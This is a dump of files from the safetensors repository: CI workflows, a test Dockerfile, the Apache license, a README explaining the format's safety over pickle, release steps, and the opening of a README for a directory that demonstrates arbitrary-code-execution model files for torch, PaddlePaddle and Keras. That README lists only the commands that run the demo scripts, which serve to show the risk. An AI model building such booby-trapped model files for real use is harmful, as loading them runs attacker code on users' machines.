42 | - name: Lint with Clippy
43 | run: cargo clippy --all-targets -- -D warnings
44 |
45 | - name: Run Tests
46 | run: cargo test --verbose
47 |
48 | - name: Run No-STD Tests
49 | run: cargo test --no-default-features --features alloc --verbose
50 |
51 | - name: Run Audit
52 | # RUSTSEC-2021-0145 comes from criterion, so it only affects benchmarks
53 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145
54 |
55 | - name: Coverage report
56 | if: matrix.os == 'ubuntu-latest'
57 | run: cargo llvm-cov --release --lcov --output-path lcov.info
58 |
59 | # - name: Upload to codecov.io
60 | # if: matrix.os == 'ubuntu-latest'
61 | # uses: codecov/codecov-action@v3
62 | # with:
63 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
64 | # working-directory: ./safetensors
65 | # fail_ci_if_error: true
66 |
--------------------------------------------------------------------------------
/.github/workflows/stale.yml:
--------------------------------------------------------------------------------
1 | name: 'Close stale issues and PRs'
2 | on:
3 | schedule:
4 | - cron: '30 1 * * *'
5 |
6 | jobs:
7 | stale:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - uses: actions/stale@v8
11 | with:
12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
13 | days-before-stale: 30
14 | days-before-close: 5
15 |
--------------------------------------------------------------------------------
/.github/workflows/trufflehog.yml:
--------------------------------------------------------------------------------
1 | on:
2 | push:
3 |
4 | name: Secret Leaks
5 |
6 | jobs:
7 | trufflehog:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - name: Checkout code
11 | uses: actions/checkout@v4
12 | with:
13 | fetch-depth: 0
14 | - name: Secret Scanning
15 | uses: trufflesecurity/trufflehog@main
16 |
--------------------------------------------------------------------------------
/.github/workflows/upload_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Upload PR Documentation
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Build PR Documentation"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | build:
11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main
12 | with:
13 | package_name: safetensors
14 | secrets:
15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | safetensors/target
2 | safetensors/**/Cargo.lock
3 | bindings/python/Cargo.lock
4 | *.bin
5 | *.h5
6 | *.msgpack
7 | *.pt
8 | *.pdparams
9 | *.safetensors
10 | *.npz
11 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | repos:
2 | - repo: https://github.com/Narsil/pre-commit-rust
3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
4 | hooks:
5 | - id: fmt
6 | name: "Rust (fmt)"
7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"]
8 | - id: clippy
9 | name: "Rust (clippy)"
10 | args:
11 | [
12 | "--manifest-path",
13 | "safetensors/Cargo.toml",
14 | "--all-targets",
15 | "--",
16 | "-Dwarnings",
17 | ]
18 | - repo: https://github.com/Narsil/pre-commit-rust
19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
20 | hooks:
21 | - id: fmt
22 | name: "Python (fmt)"
23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"]
24 | - id: clippy
25 | name: "Python (clippy)"
26 | args:
27 | [
28 | "--manifest-path",
29 | "bindings/python/Cargo.toml",
30 | "--all-targets",
31 | "--",
32 | "-Dwarnings",
33 | ]
34 | - repo: https://github.com/psf/black
35 | rev: 22.3.0
36 | hooks:
37 | - id: black
38 | name: "Python (black)"
39 | args: ["--line-length", "119", "--target-version", "py35"]
40 | types: ["python"]
41 | - repo: https://github.com/pycqa/flake8
42 | rev: 3.8.3
43 | hooks:
44 | - id: flake8
45 | args: ["--config", "bindings/python/setup.cfg"]
46 | - repo: https://github.com/pre-commit/mirrors-isort
47 | rev: v5.7.0 # Use the revision sha / tag you want to point at
48 | hooks:
49 | - id: isort
50 |
--------------------------------------------------------------------------------
/Dockerfile.s390x.test:
--------------------------------------------------------------------------------
1 | FROM s390x/python
2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \
3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \
4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh
5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y
6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y
7 | WORKDIR /safetensors/
8 | RUN /root/miniconda3/bin/pip install -U pip pytest
9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub
10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")'
11 | COPY . .
12 | SHELL ["/bin/bash", "-c"]
13 | WORKDIR /safetensors/bindings/python/
14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e .
15 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py
16 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10'
17 | ENTRYPOINT /bin/bash
18 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | doc:
2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd ..
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Python
12 | [](https://pypi.org/pypi/safetensors/)
13 | [](https://huggingface.co/docs/safetensors/index)
14 | [](https://codecov.io/gh/huggingface/safetensors)
15 | [](https://pepy.tech/project/safetensors)
16 |
17 | Rust
18 | [](https://crates.io/crates/safetensors)
19 | [](https://docs.rs/safetensors/)
20 | [](https://codecov.io/gh/huggingface/safetensors)
21 | [](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors)
22 |
23 | # safetensors
24 |
25 | ## Safetensors
26 |
27 | This repository implements a new, simple format for storing tensors
28 | safely (as opposed to pickle) while still being fast (zero-copy).
29 |
30 | ### Installation
31 | #### Pip
32 |
33 | You can install safetensors via the pip manager:
34 |
35 | ```bash
36 | pip install safetensors
37 | ```
38 |
39 | #### From source
40 |
41 | To build from source, you need Rust:
42 |
43 | ```bash
44 | # Install Rust
45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
46 | # Make sure it's up to date and using stable channel
47 | rustup update
48 | git clone https://github.com/huggingface/safetensors
49 | cd safetensors/bindings/python
50 | pip install setuptools_rust
51 | pip install -e .
52 | ```
53 |
54 | ### Getting started
55 |
56 | ```python
57 | import torch
58 | from safetensors import safe_open
59 | from safetensors.torch import save_file
60 |
61 | tensors = {
62 | "weight1": torch.zeros((1024, 1024)),
63 | "weight2": torch.zeros((1024, 1024))
64 | }
65 | save_file(tensors, "model.safetensors")
66 |
67 | tensors = {}
68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f:
69 | for key in f.keys():
70 | tensors[key] = f.get_tensor(key)
71 | ```
72 |
73 | [Python documentation](https://huggingface.co/docs/safetensors/index)
74 |
75 |
76 | ### Format
77 |
78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header
79 | - N bytes: a JSON UTF-8 string representing the header.
80 | - The header data MUST begin with a `{` character (0x7B).
81 | - The header data MAY be padded with trailing whitespace (0x20).
82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`,
83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file),
84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`).
85 | - A special key `__metadata__` is allowed; it contains a free-form string-to-string map. Arbitrary JSON is not allowed: all values must be strings.
86 | - Rest of the file: byte-buffer.
87 |
88 | Notes:
89 | - Duplicate keys are disallowed. Not all parsers may respect this.
90 | - In general the accepted subset of JSON is implicitly decided by `serde_json` for
91 | this library. Anything obscure (odd ways to represent integers, newlines and
92 | escapes in UTF-8 strings) might be modified at a later time. This would only
93 | be done for safety concerns.
94 | - Tensor values are not validated; in particular, NaN and +/-Inf may be
95 | present in the file.
96 | - Empty tensors (tensors with one dimension being 0) are allowed.
97 | They store no data in the data buffer, yet retain a size in the header.
98 | They don't bring much value, but are accepted since they are valid tensors
99 | from the perspective of traditional tensor libraries (torch, tensorflow, numpy, ..).
100 | - 0-rank tensors (tensors with shape `[]`) are allowed; they are merely scalars.
101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents
102 | the creation of polyglot files.
103 | - Endianness: little-endian.
104 | - Order: 'C' or row-major.
106 |
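To make the byte layout above concrete, here is a minimal reading sketch (not part of the library, and assuming a `model.safetensors` file such as the one produced in the Getting started snippet) that parses the header with only the Python standard library:

```python
import json
import struct

def read_header(path):
    """Read only the header of a .safetensors file."""
    with open(path, "rb") as f:
        # First 8 bytes: N, the header size, as an unsigned little-endian 64-bit integer.
        (n,) = struct.unpack("<Q", f.read(8))
        # Next N bytes: the JSON header (possibly padded with trailing whitespace).
        return json.loads(f.read(n))

header = read_header("model.safetensors")
for name, info in header.items():
    if name == "__metadata__":
        continue  # free-form string-to-string map, not a tensor
    begin, end = info["data_offsets"]
    print(name, info["dtype"], info["shape"], f"{end - begin} bytes")
```

Nothing past the header needs to be read to list the tensors, which is what makes lazy loading cheap.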
107 |
108 | ### Yet another format?
109 | 
110 | The main rationale for this crate is to remove the need to use
111 | `pickle`, which `PyTorch` uses by default.
112 | There are other formats out there, both specific to machine learning and more
113 | general-purpose.
114 |
115 |
116 | Let's take a look at alternatives and why this format is deemed interesting.
117 | This is my very personal and probably biased view:
118 |
119 | | Format                  | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 |
120 | | ----------------------- | ---- | --------- | ------------ | ------------------ | -------------- | ----------- | ------------ |
121 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
122 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ |
123 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 |
124 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 |
125 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 |
126 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ |
127 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ |
128 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ |
129 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
130 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 |
131 |
132 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code?
133 | - Zero-copy: Does reading the file require more memory than the original file?
134 | - Lazy loading: Can I inspect the file without loading everything? And can I load only
135 | some tensors in it without scanning the whole file (distributed setting)?
136 | - Layout control: Lazy loading is not necessarily enough, since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important.
137 | - No file size limit: Is there a limit to the file size?
138 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code? (~ means we can store more than pure tensors, but no custom code)
139 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are
140 | necessary)? This is becoming increasingly important in the ML world.
141 |
142 |
143 | ### Main oppositions
144 |
145 | - Pickle: Unsafe, runs arbitrary code.
146 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise, actually. Has had some classic use-after-free issues. On a very different level than pickle security-wise. Also ~210k lines of code vs ~400 lines for this lib currently.
147 | - SavedModel: Tensorflow-specific (it contains TF graph information).
148 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in a distributed setting).
149 | - Protobuf: Hard 2GB max file size limit.
150 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types), so a manual wrapper over a byte buffer would be necessary. Layout control seems possible, but not trivial, as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize).
151 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy.
152 | - Arrow: No `bfloat16` support.
153 |
154 | ### Notes
155 |
156 | - Zero-copy: No format is really zero-copy in ML: the data needs to go from disk to RAM/GPU RAM (and that takes time). On CPU, if the file is already in the OS cache, then reading it can
157 | truly be zero-copy, whereas on GPU there is no such disk cache, so a copy is always required,
158 | but you can avoid allocating all the tensors on CPU at any given point (see the sketch after these notes).
159 | SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but deserializing it takes far less time than loading the actual tensor data, and it is human-readable, so I went that way (the header is also far smaller than the tensor data).
160 |
161 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the
162 | moment.
163 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed.
164 | - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format.
165 |
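As a concrete illustration of the zero-copy note above, here is a minimal sketch (not the library's code; the tensor name `"weight"` and the `F32` dtype are assumptions for the example) that memory-maps a file and views one tensor's bytes in place:

```python
import json
import mmap
import struct

import numpy as np

with open("model.safetensors", "rb") as f:
    mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)

(n,) = struct.unpack("<Q", mm[:8])
header = json.loads(mm[8 : 8 + n])
info = header["weight"]             # hypothetical tensor name
start, stop = info["data_offsets"]  # offsets are relative to the byte buffer
# No copy happens here: the array is a view over the memory-mapped pages.
view = memoryview(mm)[8 + n + start : 8 + n + stop]
arr = np.frombuffer(view, dtype=np.float32).reshape(info["shape"])
```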
166 | ### Benefits
167 |
168 | Since we can invent a new format, we can propose additional benefits:
169 |
170 | - Prevent DOS attacks: We can craft the format in such a way that it's almost
171 | impossible to use malicious files to DOS attack a user. Currently, there's a 100MB limit
172 | on the size of the header, to prevent parsing extremely large JSON.
173 | Also, when reading the file, there's a guarantee that addresses in the file
174 | do not overlap in any way, meaning when you're loading a file you should never
175 | exceed the size of the file in memory (see the sketch below).
176 |
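A minimal sketch of that non-overlap guarantee (this mirrors the rule described here and in `attacks/README.md`, not the crate's actual code): sorted by start offset, the tensors must tile the byte buffer exactly, with no holes and no overlaps.

```python
def validate_offsets(header, buffer_len):
    # Every tensor must start exactly where the previous one stopped,
    # and the last one must end exactly at the end of the byte buffer.
    spans = sorted(
        info["data_offsets"]
        for name, info in header.items()
        if name != "__metadata__"
    )
    expected = 0
    for start, stop in spans:
        if start != expected or stop < start:
            raise ValueError("hole or overlap in tensor offsets")
        expected = stop
    if expected != buffer_len:
        raise ValueError("byte buffer is not fully covered")
```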
177 | - Faster load: PyTorch seems to be the fastest format to load among the major
178 | ML formats. However, it does seem to make an extra copy on CPU, which we
179 | can bypass in this lib by using `torch.UntypedStorage.from_file`.
180 | Currently, CPU loading times are extremely fast with this lib compared to pickle.
181 | GPU loading times are as fast or faster than the PyTorch equivalent.
182 | Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems
183 | to be faster too somehow (similar behavior in torch pickle).
184 |
185 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to
186 | load only part of the tensors on the various models. For
187 | [BLOOM](https://huggingface.co/bigscience/bloom), using this format brought the time to
188 | load the model on 8 GPUs down from 10 minutes with regular PyTorch weights to 45 seconds.
189 | This really speeds up feedback loops when developing on the model. For instance,
190 | you don't have to keep separate copies of the weights when changing the distribution
191 | strategy (for instance Pipeline Parallelism vs Tensor Parallelism); see the sketch below.
192 |
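As a sketch of what that partial loading looks like with this library's `safe_open` API (the per-rank name filter here is hypothetical):

```python
from safetensors import safe_open

tensors = {}
with safe_open("model.safetensors", framework="pt", device="cpu") as f:
    for name in f.keys():
        # Only materialize the tensors this rank actually needs;
        # the rest of the file is never read.
        if name.startswith("h.0."):  # hypothetical per-rank filter
            tensors[name] = f.get_tensor(name)
```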
193 | License: Apache-2.0
194 |
--------------------------------------------------------------------------------
/RELEASE.md:
--------------------------------------------------------------------------------
1 | # How to release
2 |
3 | ## Before the release
4 |
5 | Simple checklist on how to make releases for `safetensors`.
6 |
7 | - Freeze `main` branch.
8 | - Run all tests (Check CI has properly run)
9 | - If there was any significant work, check the benchmarks:
10 | - `cd safetensors && cargo bench` (run it on the latest release tag first to get a baseline, if it's your first time)
11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors`; we need
12 | to make sure we don't break it, and testing is one way to make sure nothing unforeseen
13 | has been done.)
14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`)
15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers`
16 | test suite.
17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708).
18 | This will create new docker images ready to run the test suites with `safetensors` from the main branch.
19 | - Wait for actions to finish
20 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712)
21 | This will run the actual full test suite.
22 | - Check the results.
23 | - **If any breaking change has been done**, make sure the version can safely be increased for `transformers` users (the `safetensors` pin must ensure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154)
24 | For instance, with `safetensors>=0.10,<0.11` we can safely release `0.11` without impacting
25 | current users.
26 | - Then start a new PR containing all desired code changes from the following steps.
27 | - You will `Create release` after the code modifications are on `main`.
28 |
29 | ## Rust
30 |
31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's
32 | very common to release for all versions at once for new features.
33 | - Edit `Cargo.toml` to reflect new version
34 | - Edit `CHANGELOG.md`:
35 | - Add relevant PRs that were added (python PRs do not belong for instance).
36 | - Add links at the end of the files.
37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
38 | - Create new Release:
39 | - Mark it as pre-release
40 | - Use new version name with a new tag (create on publish) `vX.X.X`.
41 | - Copy paste the new part of the `CHANGELOG.md`
42 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
43 | the new version to `crates.io`; there's no going back after this.
44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
46 |
47 |
48 | ## Python
49 |
50 | - Edit `bindings/python/setup.py` to reflect new version.
51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version.
52 | - Edit `CHANGELOG.md`:
53 | - Add relevant PRs that were added (node PRs do not belong for instance).
54 | - Add links at the end of the files.
55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
56 | - Create new Release:
57 | - Mark it as pre-release
58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`.
59 | - Copy paste the new part of the `CHANGELOG.md`
60 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
61 | the new version to `pypi`; there's no going back after this.
62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
64 | - This CI/CD has 3 distinct builds: `Pypi` (normal), `conda` and `extra`. `Extra` is REALLY slow (~4h); this is normal since it has to rebuild many things, but it enables the wheel to be available for old Linuxes.
65 |
66 | ## Node
67 |
68 | - Edit `bindings/node/package.json` to reflect new version.
69 | - Edit `CHANGELOG.md`:
70 | - Add relevant PRs that were added (python PRs do not belong for instance).
71 | - Add links at the end of the files.
72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
73 | - Create new Release:
74 | - Mark it as pre-release
75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`.
76 | - Copy paste the new part of the `CHANGELOG.md`
77 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
78 | the new version to `npm`; there's no going back after this.
79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
81 |
82 |
83 | ## Testing the CI/CD for release
84 |
85 |
86 | If you want to make modifications to the CI/CD of the release GH actions, you need
87 | to:
88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`.
89 | - Change the trigger mechanism so it can trigger every time you push to your branch.
90 | - Keep pushing your changes until the artifacts are properly created.
91 |
--------------------------------------------------------------------------------
/attacks/README.md:
--------------------------------------------------------------------------------
1 | The purpose of this directory is to showcase various attacks (and to help you create your own).
2 |
3 |
4 | # Torch Arbitrary code execution
5 |
6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file.
7 | ```
8 | python torch_ace_create.py
9 | python torch_ace_get_pwned.py
10 | ```
11 |
12 | # PaddlePaddle Arbitrary code execution
13 |
14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file.
15 | ```
16 | python paddle_ace_create.py
17 | python paddle_ace_get_pwned.py
18 | ```
19 |
20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`)
21 |
22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file.
23 | ```
